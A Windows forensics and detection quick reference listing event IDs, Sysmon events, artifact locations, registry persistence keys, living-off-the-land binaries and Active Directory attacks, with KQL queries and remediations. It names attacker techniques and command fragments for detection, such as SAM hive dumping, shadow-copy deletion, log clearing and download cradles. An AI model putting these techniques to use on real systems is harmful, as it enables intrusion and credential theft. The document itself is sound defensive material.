Windows Forensics & Event ID Quick Reference¶
How to use this sheet
Event IDs are grouped by category. Sysmon IDs are prefixed with S to distinguish from native Windows events. All paths use %SystemRoot% = C:\Windows.
1. Critical Windows Event IDs¶
Authentication & Logon Events¶
| Event ID | Source | Meaning | Logon Type Key | Attack Relevance | Analyst Action |
|---|---|---|---|---|---|
| 4624 | Security | Successful logon | 2=Interactive, 3=Network, 4=Batch, 5=Service, 7=Unlock, 10=RemoteInteractive, 11=CachedInteractive | Lateral movement (Type 3/10), Pass-the-Hash (Type 3 with NTLM) | Correlate IP + user + Type; flag off-hours/geo anomaly |
| 4625 | Security | Failed logon | Same types | Brute force, password spray | Alert on >5/min per user or >10 accounts from single IP |
| 4634 | Security | Account logoff (network) | — | Session tracking | Correlate with 4624 for session duration |
| 4647 | Security | User-initiated logoff | — | Session tracking | Prefer over 4634 for interactive sessions |
| 4648 | Security | Logon with explicit credentials | — | RunAs abuse, lateral movement, credential reuse | Alert when process ≠ svchost; check target username |
| 4672 | Security | Special privileges assigned | — | Admin logon; always accompanies admin 4624 | Flag non-admin accounts; correlate with 4624 |
| 4778 | Security | RDP session reconnect | — | RDP lateral movement | Correlate client IP with asset inventory |
| 4779 | Security | RDP session disconnect | — | Session tracking | Long sessions may indicate persistent access |
Process & Execution Events¶
| Event ID | Source | Meaning | Key Fields | Attack Relevance | Analyst Action |
|---|---|---|---|---|---|
| 4688 | Security | Process creation | NewProcessName, CommandLine, ParentProcess, SubjectUserName | Execution detection; requires audit policy + process CLI audit enabled | Alert on cmd.exe/powershell.exe spawned from Office; check parent-child |
| 4689 | Security | Process termination | — | Short-lived processes (defense evasion) | Correlate with 4688; very short runtime = suspicious |
Scheduled Tasks & Services¶
| Event ID | Source | Meaning | Key Fields | Attack Relevance | Analyst Action |
|---|---|---|---|---|---|
| 4698 | Security | Scheduled task created | TaskName, TaskContent, SubjectUserName | Persistence (T1053.005) | Alert on tasks created outside change window; inspect XML |
| 4699 | Security | Scheduled task deleted | — | Evidence removal | Correlate with prior 4698 |
| 4700/4701 | Security | Scheduled task enabled/disabled | — | Tamper with existing tasks | Alert on modification to existing sched tasks |
| 4702 | Security | Scheduled task updated | — | Persistence modification | Alert on changes to system scheduled tasks |
| 7045 | System | New service installed | ServiceName, ImagePath, AccountName | Persistence (T1543.003); malware installs as service | Alert on non-standard service names; check ImagePath |
| 7036 | System | Service state changed | ServiceName, State | Service stop/start | Alert on security service stops |
Account Management Events¶
| Event ID | Source | Meaning | Attack Relevance | Analyst Action |
|---|---|---|---|---|
| 4720 | Security | User account created | Persistence; adding backdoor accounts | Alert on creation outside provisioning systems |
| 4722 | Security | Account enabled | Re-enabling disabled accounts | Alert on enabling dormant/legacy accounts |
| 4723 | Security | Password change attempt | Credential manipulation | Alert when not from expected systems |
| 4724 | Security | Password reset by admin | Forced reset; admin credential abuse | Alert on bulk resets or off-hours resets |
| 4725 | Security | Account disabled | Account takeover covering tracks | Alert on disabling IT/security accounts |
| 4726 | Security | Account deleted | Evidence removal | Alert on deletion during incidents |
| 4732 | Security | Member added to security group | Privilege escalation; group-based access | Alert on additions to Domain Admins, Administrators |
| 4733 | Security | Member removed from security group | Covering tracks | Alert on removal from high-privilege groups |
| 4740 | Security | Account locked out | Brute force / password spray | Alert on >3 lockouts; correlate source IPs |
Kerberos & NTLM Events¶
| Event ID | Source | Meaning | Key Fields | Attack Relevance | Analyst Action |
|---|---|---|---|---|---|
| 4768 | Security | Kerberos TGT requested | EncryptionType, ClientAddress | AS-REP Roasting (no pre-auth); Golden Ticket use | Flag EncType 0x17 (RC4); flag IPs outside AD subnets |
| 4769 | Security | Kerberos service ticket requested | ServiceName, EncryptionType | Kerberoasting (RC4 requested for SPN) | Alert on 0x17 EncType for non-legacy services; high volume |
| 4771 | Security | Kerberos pre-auth failed | ClientAddress, FailureCode | AS-REP Roasting attempts; brute force | Alert on 0x18 code (bad password) in volume |
| 4776 | Security | NTLM credential validation | Workstation, ErrorCode | Pass-the-Hash; NTLM relay | Alert on unexpected NTLM from modern workstations; 0xC000006A = wrong password |
Audit & Log Integrity Events¶
| Event ID | Source | Meaning | Attack Relevance | Analyst Action |
|---|---|---|---|---|
| 1102 | Security | Audit log cleared | Defense evasion (T1070.001) | Immediate escalation — correlate with prior activity |
| 104 | System | System log cleared | Defense evasion | Immediate escalation |
| 4719 | Security | System audit policy changed | Disabling audit (T1562.002) | Alert on any policy change |
Sysmon Events (requires Sysmon deployment)¶
| Sysmon ID | Meaning | Key Fields | Attack Relevance | Analyst Action |
|---|---|---|---|---|
| S1 | Process create | Image, CommandLine, ParentImage, Hashes, User | Gold standard for execution detection | Build parent-child trees; hash reputation lookup |
| S2 | File creation time changed | — | Timestomping (T1070.006) | Alert on mismatch between creation/modification time |
| S3 | Network connection | DestIP, DestPort, Image, User | C2 beaconing; lateral movement | Beacon detection; flag connections from system processes |
| S6 | Driver loaded | ImageLoaded, Hashes, Signed | Rootkit/driver-based attacks | Alert on unsigned drivers |
| S7 | Image (DLL) loaded | ImageLoaded, Signed, Hashes | DLL hijacking; injection | Alert on unsigned DLLs loaded by trusted processes |
| S8 | CreateRemoteThread | SourceImage, TargetImage | Process injection (T1055) | Alert on cross-process thread creation |
| S10 | ProcessAccess (LSASS) | SourceImage, TargetImage, GrantedAccess | Credential dumping (T1003.001) | Critical — alert on any non-SYSTEM access to lsass.exe |
| S11 | File created | TargetFilename | Dropper activity; ransomware | Alert on high-volume file creation; suspicious extensions |
| S12 | Registry object added/deleted | TargetObject | Registry persistence | Monitor Run keys; alert on new entries |
| S13 | Registry value set | TargetObject, Details | Registry persistence/evasion | Alert on security-relevant keys |
| S15 | File stream created (ADS) | TargetFilename, Contents | NTFS ADS hiding (T1564.004) | Alert on any ADS creation outside known software |
| S17/S18 | Named pipe created/connected | PipeName | Cobalt Strike/lateral movement | Alert on default CS pipe names (\postex_, \mojo) |
| S22 | DNS query | QueryName, QueryResults | C2 via DNS; DGA domains | Alert on high-entropy domains; known bad TLDs |
| S25 | ProcessTampering | — | Process hollowing/herpaderping | Alert on any event |
PowerShell Events¶
| Event ID | Source | Meaning | Attack Relevance | Analyst Action |
|---|---|---|---|---|
| 4103 | PowerShell | Module/pipeline execution | Obfuscated cmdlets; download cradles | Decode base64; flag IEX, Invoke-Expression, DownloadString |
| 4104 | PowerShell | Script block logging | Best PS visibility — logs all code including deobfuscated | Alert on AMSI bypass patterns; Add-MpPreference -ExclusionPath |
| 400/403 | PowerShell | Engine start/stop | Rapid PS invocations | Correlate with process events |
2. Windows Forensic Artifacts Quick Reference¶
| Artifact | Location | What It Reveals | Forensic Tool |
|---|---|---|---|
| Prefetch | %SystemRoot%\Prefetch\*.pf | Program execution (name, count, last 8 run times) | WinPrefetchView, PECmd (EricZimmerman) |
| Shimcache (AppCompatCache) | HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\AppCompatCache | Files that touched disk (exe path + modified time); NOT proof of execution | AppCompatCacheParser |
| Amcache | %SystemRoot%\AppCompat\Programs\Amcache.hve | Program execution evidence; SHA1 hash of executable | AmcacheParser |
| UserAssist | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist (ROT13-encoded) | GUI program execution by user; run count + last time | UserAssist.exe, RegRipper |
| RecentDocs | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs | Files opened by user by extension | RegRipper |
| MRU Lists | HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32 | Files opened via Open/Save dialogs | RegRipper |
| LNK Files | %APPDATA%\Microsoft\Windows\Recent\ | File/folder access (local or network); original MAC times | LECmd, LNKParser |
| Jump Lists | %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations\ CustomDestinations\ | Per-app recently opened files | JLECmd |
| Shellbags | HKCU\Software\Microsoft\Windows\Shell\BagMRU | Folders accessed (including deleted/network/USB) | ShellBagsExplorer |
| NTFS $MFT | Root of each NTFS volume | Full file system metadata; hard-deleted file traces | MFTECmd, Autopsy |
| NTFS $LogFile | Root of each NTFS volume | NTFS journal — file ops (creates, renames, deletes) | LogFileParser |
| USN Journal | %SystemDrive%\$Extend\$UsnJrnl | Recent file system changes (128 days typical) | MFTECmd (-f $UsnJrnl) |
| Registry Hives | %SystemRoot%\System32\config\ (SAM, SECURITY, SOFTWARE, SYSTEM) | System config, user accounts, installed software | RegRipper, Registry Explorer |
| NTUSER.DAT | %USERPROFILE%\NTUSER.DAT | Per-user registry hive | Registry Explorer |
| Windows Event Logs | %SystemRoot%\System32\winevt\Logs\ | See Section 1 | Event Log Explorer, EvtxECmd |
| Browser History (Chrome) | %LOCALAPPDATA%\Google\Chrome\User Data\Default\History | SQLite DB — visited URLs, search terms | DB Browser, Hindsight |
| Browser History (Edge) | %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\History | Same format as Chrome | DB Browser, Hindsight |
| Browser History (Firefox) | %APPDATA%\Mozilla\Firefox\Profiles\*.default\places.sqlite | SQLite DB — history + bookmarks | DB Browser |
| Recycle Bin | C:\$Recycle.Bin\<SID>\ | Deleted files ($I = metadata, $R = content) | Rifiuti2 |
| Volume Shadow Copies | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy* | Historical file versions | vssadmin list shadows; ShadowExplorer |
| Hibernation File | %SystemDrive%\hiberfil.sys | Memory snapshot at hibernate (may contain creds, encryption keys) | Volatility, Hibernation Recon |
| Page File | %SystemDrive%\pagefile.sys | Swapped memory contents | Strings analysis, Volatility |
| SRUM | %SystemRoot%\System32\sru\SRUDB.dat | Network/CPU/GPU usage per-app (60-day history) | SrumECmd |
3. Registry Persistence Locations¶
| Registry Key Path | Persistence Type | Runs As | Detection Method |
|---|---|---|---|
HKCU\Software\Microsoft\Windows\CurrentVersion\Run | User logon autostart | Logged-in user | Sysmon S12/S13; RegRipper; Autoruns |
HKLM\Software\Microsoft\Windows\CurrentVersion\Run | System-wide logon autostart | Any user | Same; higher privilege |
HKCU\...\RunOnce | One-time execution on logon | User | Check and clear immediately |
HKLM\...\RunOnce | One-time system execution | Any | Same |
HKLM\SYSTEM\CurrentControlSet\Services\ | Service-based persistence | SYSTEM | EID 7045; check ImagePath |
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon — Userinit, Shell | Winlogon hijack | SYSTEM | Any value other than defaults is malicious |
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<exe> | Debugger hijack (T1546.012) | Varies | Alert on Debugger value added |
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\ | IE/legacy BHO | User | Legacy; still seen in enterprise |
HKLM\SYSTEM\CurrentControlSet\Control\Lsa — Authentication Packages | SSP/AP injection | SYSTEM | Alert on any changes |
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\ | Winlogon notification hijack | SYSTEM | Alert on new keys |
HKCU\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\ | COM hijack via context menu | User | Baseline and alert on new entries |
HKCU\SOFTWARE\Classes\CLSID\ | COM object hijack | User | Sysmon S12/S13 on this path |
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler | Scheduled task COM | SYSTEM | Rare; immediate alert |
HKCU\Environment — UserInitMprLogonScript | Logon script | User | Alert on any value |
HKLM\SOFTWARE\Policies\Microsoft\Windows\System — Scripts | Group Policy startup scripts | SYSTEM | Check GPO and registry |
4. LOLBAS Quick Reference — Top 20 Living-Off-the-Land Binaries¶
| Binary | Legitimate Use | Attacker Use | Detection Tip |
|---|---|---|---|
| certutil.exe | Certificate management | Download files; base64 decode | Flag -urlcache, -decode args |
| powershell.exe | Administration scripting | Download/exec; obfuscation; bypass | Flag -enc, -nop, -w hidden, IEX, DownloadString |
| mshta.exe | Run HTA applications | Execute inline VBScript/JScript | Alert on mshta.exe with URL arg or spawning unusual children |
| regsvr32.exe | Register COM DLLs | Execute DLL/SCT without disk write (Squiblydoo) | Alert on /s /n /u /i:http args; unusual parents |
| rundll32.exe | Load DLL exports | Execute malicious DLL functions | Alert on args pointing to Temp/AppData paths |
| wscript.exe / cscript.exe | Windows Script Host | Execute JS/VBS malware | Alert on scripts in Temp/Downloads; unusual parent |
| msiexec.exe | Install MSI packages | Remote MSI payload delivery | Flag /q + URL arguments |
| bitsadmin.exe | Background transfer service | Download files; persist via BITS jobs | Flag /transfer + URL args; check active BITS jobs |
| schtasks.exe | Manage scheduled tasks | Create persistent execution | Flag /create + /tr pointing to scripts |
| at.exe | Legacy task scheduler | Same as schtasks | Deprecated but still present |
| wmic.exe | WMI administration | Lateral movement; process execution; persistence | Alert on process call create, /node: for remote exec |
| net.exe / net1.exe | Network/user management | Recon; account creation; share access | Alert on net user /add, net group "Domain Admins" /add |
| nltest.exe | Domain trust queries | Domain recon; DC enumeration | Alert on /domain_trusts, /dclist: in non-admin context |
| whoami.exe | Show current user | Post-exploitation recon | Alert when spawned by remote access processes |
| ipconfig.exe / arp.exe | Network configuration | Network discovery | Suspicious when executed by non-user processes |
| reg.exe | Registry management | Read SAM/SECURITY; persistence | Flag save HKLM\SAM and save HKLM\SECURITY |
| vssadmin.exe | Volume shadow management | Delete backups (ransomware) | Critical — alert on delete shadows |
| wevtutil.exe | Event log management | Clear event logs (T1070.001) | Alert on cl (clear-log) subcommand |
| odbcconf.exe | ODBC configuration | DLL execution via response file | Alert on /f or /a REGSVR arguments |
| forfiles.exe | Batch file operations | Command execution; defense evasion | Alert when spawned by scripts with /c flag |
5. Active Directory Attack Quick Reference¶
Kerberoasting (T1558.003)¶
| Field | Detail |
|---|---|
| What | Request TGS tickets for SPN-registered accounts; crack offline |
| Prerequisite | Any domain user account; SPN-registered service accounts with weak passwords |
| Detection Events | EID 4769 — TicketEncryptionType = 0x17 (RC4-HMAC); high volume from single host |
| KQL | SecurityEvent \| where EventID==4769 and TicketEncryptionType=="0x17" and ServiceName !endswith "$" |
| Remediation | Use AES-only encryption for service accounts; use MSAs/gMSAs; long random passwords (25+) |
AS-REP Roasting (T1558.004)¶
| Field | Detail |
|---|---|
| What | Request AS-REP for accounts with pre-auth disabled; crack offline |
| Prerequisite | Account with "Do not require Kerberos preauthentication" set |
| Detection Events | EID 4768 — PreAuthType = 0 |
| KQL | SecurityEvent \| where EventID==4768 and PreAuthType=="0" |
| Remediation | Enable pre-auth on all accounts; audit quarterly via Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} |
DCSync (T1003.006)¶
| Field | Detail |
|---|---|
| What | Simulate DC replication to pull password hashes |
| Prerequisite | Replication rights (Domain Admin, Enterprise Admin, or custom delegation) |
| Detection Events | EID 4662 — Object: DS-Replication-Get-Changes-All ({1131f6ad...}); source IP is not a DC |
| Remediation | Audit replication permissions; monitor non-DC machines generating 4662 |
Golden Ticket (T1558.001)¶
| Field | Detail |
|---|---|
| What | Forge TGT using KRBTGT hash; any user, any lifetime |
| Prerequisite | KRBTGT account hash (via DCSync or DC compromise) |
| Detection Events | EID 4769 with unusual encryption; 4624 with abnormal ticket lifetime; tickets referencing non-existent accounts |
| Remediation | Reset KRBTGT password twice (24h apart); enables detection of forged tickets |
Silver Ticket (T1558.002)¶
| Field | Detail |
|---|---|
| What | Forge TGS for specific service using service account hash; bypasses KDC |
| Prerequisite | Service account NTLM hash |
| Detection Events | EID 4624 with no preceding 4768/4769 on DC; unusual service access patterns |
| Remediation | Protect service account passwords; enable PAC validation |
Pass-the-Hash (T1550.002)¶
| Field | Detail |
|---|---|
| What | Use NTLM hash directly to authenticate without knowing plaintext password |
| Prerequisite | Local or domain admin hash (from Mimikatz/credential dump) |
| Detection Events | EID 4624 Type 3 with NtLmSsp package; lateral movement pattern; admin share access 5140 |
| Remediation | Enable Credential Guard; disable NTLM where possible; tiered admin model |
Pass-the-Ticket (T1550.003)¶
| Field | Detail |
|---|---|
| What | Inject stolen Kerberos ticket into session |
| Prerequisite | Valid Kerberos TGT or TGS stolen from memory |
| Detection Events | EID 4768/4769 from unusual source IPs; ticket anomalies; Sysmon S10 on LSASS |
| Remediation | Credential Guard; short ticket lifetimes; monitor LSASS access |
Overpass-the-Hash (T1550.002 variant)¶
| Field | Detail |
|---|---|
| What | Convert NTLM hash into Kerberos TGT (privilege escalation via hash) |
| Prerequisite | User's NTLM hash |
| Detection Events | EID 4768 from workstation IP (normally only DCs request TGTs); RC4 downgrade |
| Remediation | Same as PTH; monitor RC4 Kerberos requests; AES enforcement |